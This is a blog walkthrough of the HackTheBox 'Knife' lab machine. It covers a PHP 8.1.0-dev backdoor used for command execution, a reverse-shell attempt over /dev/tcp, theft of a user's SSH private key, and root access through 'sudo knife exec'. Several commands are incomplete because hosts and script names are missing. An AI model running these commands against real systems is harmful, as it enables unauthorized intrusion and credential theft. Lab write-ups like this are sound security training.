How to get an SSH Access on Knife – HackTheBox


Commands :

nmap -T5

Autorecon run in background 


Web enumeration

Commands :

nmap -sC -sV -p 80

No exploit for apache 2.4.41….

Not very interresting so I have to enumerate more.

PHP 8.1.0-dev

As I always use Autorecon in background in case of, I check the result of all his scan. The whatweb tool give to me all version who are they used in the web server.

To see the results, I use Sublime Text and this command when I am in the directory of the scan resultat : subl .

With that, all files are open automatically in sublim text, and it makes win a lot of time when you have to check the  results.

whatweb command :


When you search for php 8.1.0-dev in google you find some website who talk about backdoor remote command injection like this one :

or this one  :

The first one is a python script who do the job for you, the second you have to change the setting for the User-agent of the get request.

I decide to use the first one.

The usage command line said :

python3 -u http://ip/ -c cmd

so I try this command

python3 -u -c ls

and I have the content of /

Then I try to get a reverse shell, with no success with this kind of cmdline :

python3 -u -c ‘bash -i >& /dev/tcp/ 0>&1’

Initial access - SSH

As always, you have to think how many possibilities you have to enter in a system. And remember, the first nmap scan. Two ports are open, 22 and 80. So, I check if in the home directory a .ssh folder exist.

python3 -u -c ‘ls -alR /home/james/’


Command to diplay the id_rsa key :

python3 -u -c ‘cat /home/james/.ssh/id_rsa’

After, copy the result and put it in a new file, in your kali box.

Change the permission :

chmod 600 id_rsa

SSH connexion

ssh james@ -i id_rsa

Privilege escalation

One of the first things to do is to check the user permissions whit sudo -l


James has root priviliege to run /usr/bin/knife . I spent some time to search how to I can use this to get root acces.

Finally, I see this part when you execute this command sudo /usr/bin/knife


But it’s not enough, I have to know what language Knife software use. Go back to google and search for documentation.

On this link,, we can see that knife use ruby language.

I try different ruby script, like this one, it’s working, but the shell is too instable and close very fast. Even with this little script :

fork { exec(« ls ») }

Root just for few seconds…

Finally, I try this command line :

sudo /usr/bin/knife exec –exec « exec ‘/bin/sh -i' »

Get root priv!!!


That’s all folks

Merci d’avoir pris la peine de venir sur le site de lire ce Write Up

J’espère qu’il vous a plus et qu’il vous apprit des nouvelles choses.

N’hésitez pas à laisse un commentaire ou à partager cet article.